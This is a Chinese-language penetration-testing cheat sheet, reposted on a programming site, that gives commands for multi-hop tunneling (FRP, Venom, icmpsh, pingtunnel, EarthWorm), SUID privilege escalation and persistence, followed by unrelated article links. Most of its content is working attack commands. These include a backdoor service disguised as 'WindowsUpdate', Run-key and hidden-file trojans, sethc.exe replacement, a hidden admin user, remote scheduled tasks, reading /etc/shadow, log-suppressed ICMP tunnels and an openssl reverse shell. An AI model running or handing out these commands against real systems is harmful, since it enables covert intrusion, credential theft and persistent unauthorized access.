多级代理与提权维权

目录

  • 代理构建
    • FRP
      • 介绍
      • 下载
      • 配置⽂件:
    • sock5代理
    • Venom
      • 介绍
      • 下载
      • 配置
    • icmpsh
      • 介绍
      • 下载
      • 配置
    • pingtunnel
      • 介绍
      • 下载
      • 配置
    • EarthWorm
      • 介绍
      • 下载
      • 使用
  • 权限提升
    • win权限提升
      • 常⻅利⽤⼯具
    • Linux权限提升
      • SUID提权
  • 权限维持
    • win权限维持
      • 系统服务后⻔
      • ⾃启动⽬录
      • 注册表后⻔
      • 其他类似
      • 隐藏⽤户
      • 计划任务
    • Linux权限维持
      • SSH密钥
      • 加密反弹shell

代理构建

在这里插入图片描述

FRP

介绍

frp 是⼀个专注于内⽹穿透的⾼性能的反向代理应⽤,⽀持 TCP、UDP、HTTP、HTTPS 等多种协
议。可以将内⽹服务以安全、便捷的⽅式通过具有公⽹ IP 节点的中转暴露到公⽹。其功能特性⽀持:⽀
持 TCP、KCP 以及 Websocket 等多种协议;采⽤ TCP 连接流式复⽤,在单个连接间承载更多请求,节
省连接建⽴时间;代理组间的负载均衡;端⼝复⽤,多个服务通过同⼀个服务端端⼝暴露;多个原⽣⽀持的客
户端插件(静态⽂件查看,HTTP、SOCK5 代理等)。

下载

https://github.com/fatedier/frp

配置⽂件:

https://github.com/fatedier/frp/blob/dev/conf/frps_full_example.toml
https://github.com/fatedier/frp/blob/dev/conf/frpc_full_example.toml

服务端:

[common]
bind_port = 7000
token = test@123

客户端

[common]
server_addr = 192.168.1.131
server_port = 7000
token = test@123
[socks5]
type = tcp
remote_port = 1081
plugin = socks5
plugin_user = test
plugin_passwd = 123
use_encryption = true
use_compression = true

sock5代理

安装prroxifier:
https://www.proxifier.com/
配置代理服务器和代理规则后,可访问内网系统

Venom

介绍

Venom是⼀款为渗透测试⼈员设计的使⽤Go开发的多级代理⼯具。Venom可将多个节点进⾏连接,然后
以节点为跳板,构建多级代理。渗透测试⼈员可以使⽤Venom轻松地将⽹络流量代理到多层内⽹,并轻
松地管理代理节点。其功能特性⽀持:多级socks5代理、多级端⼝转发、端⼝复⽤
(apache/mysql/…)、ssh隧道、节点间通信加密。

下载

https://github.com/Dliv3/Venom/

配置

VPS:120.10.120.X
admin_linux_x64 -lport 7000 -passwd test@123
goto 1
listen 1081
goto 2
socks 1081
主机A:192.168.3.68
agent.exe -rhost 120.10.120.X -rport 7000 -passwd test@123
主机B:192.168.3.30
agent.exe -rhost 192.168.3.68 -rport 1080 -passwd test@123

icmpsh

介绍

icmpsh是⼀个简单的反向ICMP shell⼯具。与其他类似的开源⼯具相⽐,主要优势在于它不需要管理权限即
可在⽬标机器上运⾏。
客户端只能在Windows机器运⾏,服务端可以在任何平台上运⾏。

下载

https://github.com/bdamele/icmpsh

配置

服务端:

git clone https://github.com/inquisb/icmpsh.git
#关闭icmp回复,如果要开启icmp回复,该值设置为0
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#运⾏,第⼀个IP是VPS的eth0⽹卡IP,第⼆个IP是⽬标机器出⼝的公⽹IP
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
python2 get-pip.py
python2 -m pip install impacket
python2 icmpsh_m.py 192.168.1.133 192.168.1.137

客户端:

-t 主机ip地址以发送ping请求。这个选项是强制性的!
-r 发送⼀个包含字符串“Test1234”的测试icmp请求,然后退出。
-d 毫秒请求之间的延迟(毫秒)
-o 毫秒响应超时(毫秒)。如果没有及时收到回复,从机将增加空⽩计数器。如果该计数器达到某个极限,从机将退出。
如果收到响应,计数器将设置回0。
-b 空⽩数量限制(退出前未答复的icmp请求)
-s 字节最⼤数据缓冲区⼤⼩(字节)
icmpsh.exe -t 192.168.1.133 -d 500 -b 30 -s 128

pingtunnel

介绍

Pingtunnel 是⼀种通过 ICMP 发送 TCP/UDP 流量的⼯具。其是最流⾏的⼀款ICMP代理⼯具,提供对
tcp/udp/sock5流量伪装成icmp流量进⾏转发的功能。需要root或者administrator/system权限。

下载

https://github.com/esrrhs/pingtunnel

配置

需要高权限
服务端:

-type server 代表开启ICMP SERVER端,等待客户端进⾏连接与通信。
-noprint 1 不在控制台打印⽇志
-nolog 1 不存储⽇志⽂件
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
./pingtunnel -type server -noprint 1 -nolog 1

客户端:

pingtunnel.exe -type client -l :4455 -s 192.168.1.133 -sock5 1 -noprint 1 -nolog 1 

EarthWorm

介绍

EW 是⼀套便携式的⽹络穿透⼯具,具有 SOCKS v5服务架设和端⼝转发两⼤核⼼功能,可在复杂⽹络环境下
完成⽹络穿透。
能够以“正向”、“反向”、“多级级联”等⽅式打通⼀条⽹络隧道,直达⽹络深处。

下载

https://github.com/rootkiter/EarthWorm

使用

EW共有6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)
ssocksd:正向代理、rcsocks:流量转发、rssocks:socks5反弹
lcx_slave:端⼝绑定、lcx_listen:流量转发、lcx_tran:端⼝转发
lcx_slave 该管道⼀侧通过反弹⽅式连接代理请求⽅,另⼀侧连接代理提供主机。
lcx_tran 该管道,通过监听本地端⼝接收代理请求,并转交给代理提供主机。
lcx_listen该管道,通过监听本地端⼝接收数据,并将其转交给⽬标⽹络回连的代理提供主机。
通过组合lcx类别管道的特性,可以实现多层内⽹环境下的渗透测试。
-l 为服务启动打开⼀个端⼝。
-d 设置反弹主机地址。
-e 设置反弹端⼝。
-f 设置连接主机地址。
-g连接端⼝设置连接端⼝。
-t 设置超时的毫秒数。默认值值是1000

客户端:

ew.exe -s rssocks -d 192.168.1.131 -e 8888

服务端:

ew.exe -s rcsocks -l 1080 -e 8888

权限提升

win权限提升

在这里插入图片描述

常⻅利⽤⼯具

巨⻰拉冬:
https://github.com/k8gege/Aggressor
taowu:
https://github.com/pandasec888/taowu-cobalt_strike

Linux权限提升

在这里插入图片描述

SUID提权

查找SUID

find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null

命令提权

find pentestlab -exec whoami \;
vim.tiny /etc/shadow
awk 'BEGIN{system("whoami")}'
curl file:///etc/shadow
less /etc/passwd
nmap --interactive

权限维持

win权限维持

在这里插入图片描述

系统服务后⻔

注册服务

sc create "WindowsUpdate" binpath= "cmd /c start "C:\Users\Administrator\De
sktop\beacon.exe""&&sc config "WindowsUpdate" start= auto&&net start Window
sUpdate

查询服务

sc query WindowsUpdate

删除服务

sc delete WindowsUpdate

⾃启动⽬录

将⽊⻢样本放⼊系统的启动⽬录当中 ,可针对重启主机 。

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

注册表后⻔

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /
v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe" 
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnc
e" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe" 
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunSer
vices" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe" 
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunSer
vicesOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe”
⼿⼯加⽩,然后利⽤bat命令,隐藏⽊⻢
attrib +s +h C:\Users\pentestlab\pentestlab.exe
SHIFT后⻔
将C:windows/system32/sethc.exe替换为cmd.exe。
登陆界⾯连按5下Shift键,可调出cmd.exe。

其他类似

屏幕键盘:C:\Windows\System32\osk.exe
放⼤镜:C:\Windows\System32\Magnify.exe
旁⽩:C:\Windows\System32\Narrator.exe
显示切换器 C:\Windows\System32\DisplaySwitch.exe
应⽤切换器:C:\Windows\System32\AtBroker.exe

隐藏⽤户

net user test$ P@ssw0rd123 /add
net localgroup administrators test$ /add
net localgroup administrators

计划任务

(at<2012):

at \\ 191.168.3.144 16:52 c:\transfer.exe 

(schtasks>=2012) :

创建任务
shell schtasks /create /s 192.168.3.144 /ru system /u dbadmin /p admin!@#4
5 /tn transfer /sc DAILY /tr c:\transfer.exe /f
运⾏任务
shell schtasks /run /s 192.168.3.144 /u dbadmin /p admin!@#45 /tn transfer 
/i
删除任务
schtasks /delete /s 192.168.3.144 /u dbadmin /p admin!@#45 /tn transfer /f

Linux权限维持

在这里插入图片描述

SSH密钥

⽣成公私钥:

ssh -keygen -b 4096 -t rsa 

上传公钥到~/.ssh/id_rsa.pub

ssh-copy-id -i ~/.ssh/id_rsa.pub root@192.168.227.136

免密登录

ssh -p 22 root@192.168.227.136 

加密反弹shell

⽣成证书

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 
-nodes

服务端监听

nc -lvp 443  

客户端反弹
载⼊证书,再反弹

openssl s_server -quiet -key key.pem -cert cert.pem -port 443
mkfifo /tmp/z; /bin/bash -i < /tmp/z2>&1| openssl s_client -quiet -connect 
x.x.x.x:443 > /tmp/z; rm -rf /tmp/z

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/442470.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【Python】干货分享丨从入门到编写POC之常用的标准库

Python从入门到编写POC系列文章原创的一套完整教程&#xff0c;想系统学习Python技能的小伙伴&#xff0c;不要错过哦&#xff01; 常用的标准库 安装完Python之后&#xff0c;我们也同时获得了强大的Python标准库&#xff0c;通过使用这些标准库可以为我们节省大量的时间&a…

5.k8s:helm包管理器,prometheus监控,elk,k8s可视化

目录 一、Helm 包管理器 1.什么是 Helm 2.安装Helm &#xff08;3&#xff09;Helm常用命令 &#xff08;4&#xff09;目录结构 &#xff08;5&#xff09;使用Helm完成redis主从搭建 二、Prometheus集群监控 1.监控方案 2.Prometheus监控k8s 三、ELK日志搜集 1.el…

图片压缩30KB以下怎么做?建议试试这些方法

图片怎么压缩30KB以下&#xff1f;在数字时代&#xff0c;无论是网页设计、社交媒体分享还是电子邮件附件发送&#xff0c;图片的大小往往成为影响加载速度和用户体验的关键因素之一。特别是在需要上传图片到对文件大小有限制的平台时&#xff0c;如何有效地将图片压缩至30KB甚…

【多重循环在Java中的应用】

多重循环在Java中的应用 介绍 多重循环是将一个循环嵌套在另一个循环体内的编程结构。Java中的 for、while 和 do...while 循环均可作为外层循环和内层循环。建议使用两层嵌套&#xff0c;最多不超过三层&#xff0c;以保持代码的可读性。 在多重循环中&#xff0c;外层循环执…

【重学 MySQL】六十二、非空约束的使用

【重学 MySQL】六十二、非空约束的使用 定义目的关键字特点作用创建非空约束删除非空约束注意事项 在MySQL中&#xff0c;非空约束&#xff08;NOT NULL Constraint&#xff09;是一种用于确保表中某列不允许为空值的数据库约束。 定义 非空约束&#xff08;NOT NULL Constra…

ES postman操作全量修改,局部修改,删除

全量修改 修改需要调用的url 地址是http://192.168.1.108:9200/shopping/_doc/1001&#xff0c;调用方法使用put 只修改指定的需求的内容的请求方式 post方式就是局部修改 http://192.168.1.108:9200/shopping/_update/1001&#xff0c;请求方式post 上图是只修改id 为1001数…

Leetcode—416. 分割等和子集【中等】

2024每日刷题&#xff08;172&#xff09; Leetcode—416. 分割等和子集 C实现代码 class Solution { public:bool canPartition(vector<int>& nums) {int sum accumulate(nums.begin(), nums.end(), 0);if(sum % 2) {return false;}int m nums.size();int subSu…

leetcode68:文本左右对齐

给定一个单词数组 words 和一个长度 maxWidth &#xff0c;重新排版单词&#xff0c;使其成为每行恰好有 maxWidth 个字符&#xff0c;且左右两端对齐的文本。 你应该使用 “贪心算法” 来放置给定的单词&#xff1b;也就是说&#xff0c;尽可能多地往每行中放置单词。必要时可…

如何免费为域名申请一个企业邮箱

背景 做SEO的是有老是会有一些网站来做验证你的所有权&#xff0c;这个时候&#xff0c;如果你域名对应的企业邮箱就会很方便。zoho为了引导付费&#xff0c;有很多多余的步骤引导&#xff0c;反倒是让不付费的用户有些迷茫&#xff0c;所以会写这个教程&#xff0c;按照教程走…

2-116 基于matlab的主成分分析(PCA)及累积总和(CUSUM)算法故障监测

基于matlab的主成分分析&#xff08;PCA&#xff09;及累积总和&#xff08;CUSUM&#xff09;算法故障监测&#xff0c;针对传统的多元统计分析方法对生产过程中微小故障检测不灵敏的问题&#xff0c;使用基于主元分析的累积和的微小故障检测方法进行故障监测&#xff0c;通过…

栈与队列面试题(Java数据结构)

前言&#xff1a; 这里举两个典型的例子&#xff0c;实际上该类型的面试题是不确定的&#xff01; 用栈实现队列&#xff1a; 232. 用栈实现队列 - 力扣&#xff08;LeetCode&#xff09; 方法一&#xff1a;双栈 思路 将一个栈当作输入栈&#xff0c;用于压入 push 传入的数…

路由器的工作机制

在一个家庭或者一个公司中 路由器的作用主要有两个(①路由–决定了数据包从来源到目的地的路径 通过映射表决定 ②转送–通过路由器知道了映射表 就可以将数据包从路由器的输入端转移给合适的输出端) 我们可以画一张图来分析一下&#xff1a; 我们好好来解析一下这张图&#x…

胤娲科技:AI重塑会议——灵动未来,会议新纪元

你是否曾经历过这样的会议场景&#xff1a;会议纪要不准确&#xff0c;人名张冠李戴&#xff1b;错过会议&#xff0c;却无从回顾关键内容&#xff1b;会议效率低下&#xff0c;时间白白流逝&#xff1f; 这些问题仿佛成了现代会议的“顽疾”。然而&#xff0c;随着AI技术的飞速…

Pywinauto,一款 Win 自动化利器!

1.安装 pywinauto是一个用于自动化Python模块&#xff0c;适合Windows系统的软件&#xff08;GUI&#xff09;&#xff0c;可以通过Pywinauto遍历窗口&#xff08;对话框&#xff09;和窗口里的控件&#xff0c;也可以控制鼠标和键盘输入&#xff0c;所以它能做的事情比之前介…

论文速读:基于渐进式转移的无监督域自适应舰船检测

这篇文章的标题是《Unsupervised Domain Adaptation Based on Progressive Transfer for Ship Detection: From Optical to SAR Images》基于渐进式转移的无监督域自适应舰船检测:从光学图像到SAR图像&#xff0c;作者是Yu Shi等人。文章发表在IEEE Transactions on Geoscience…

ARTS Week 43

Algorithm 本周的算法题为 1822. 数组元素积的符号 已知函数 signFunc(x) 将会根据 x 的正负返回特定值&#xff1a; 如果 x 是正数&#xff0c;返回 1 。 如果 x 是负数&#xff0c;返回 -1 。 如果 x 是等于 0 &#xff0c;返回 0 。 给你一个整数数组 nums 。令 product 为数…

《神经网络》—— 循环神经网络RNN(Recurrent Neural Network)

文章目录 一、RNN 简单介绍二、RNN 基本结构1.隐藏中的计算2.输出层的计算3.循环 三、RNN 优缺点1.优点2.缺点 一、RNN 简单介绍 循环神经网络&#xff08;Recurrent Neural Network, RNN&#xff09;是一种用于处理序列数据的神经网络架构。 与传统的前馈神经网络&#xff08…

现代身份和访问管理 IAM 如何降低风险

您的公司是否仍在使用 1998 年时的身份管理系统&#xff1f;仅凭用户名和密码就能登录本地网络并访问几乎所有资源吗&#xff1f; 虽然大多数企业已经转向现代身份和访问管理(IAM) 平台&#xff0c;但成千上万的企业和其他组织仍然依赖过时的用户名/密码系统。 如果你看一下传…

微知-如何临时设置Linux系统时间?(date -s “2024-10-08 22:55:00“, time, hwclock, timedatectl)

背景 在tar解压包的时候经常出现时间不对&#xff0c;可以临时用date命令修改一下&#xff0c;也可以其他&#xff0c;本文主要介绍临时修改的方法 date命令修改 sudo date -s "2024-10-08 22:55:00"其他查看和修改的命令 本文只记录查看方式&#xff0c;修改的暂…

分享几个国外SSL证书提供商网站

国外SSL证书提供商 众所周知兼容性高的SSL证书肯定是在国外申请的&#xff0c;主要确保SSL证书的安全性的同时&#xff0c;对于安全标准在国外相比而言更成熟&#xff0c;保护程度也比较高。 另方面对需要申请的域名没有限制&#xff0c;可选性SSL证书类型种类比较多&#xf…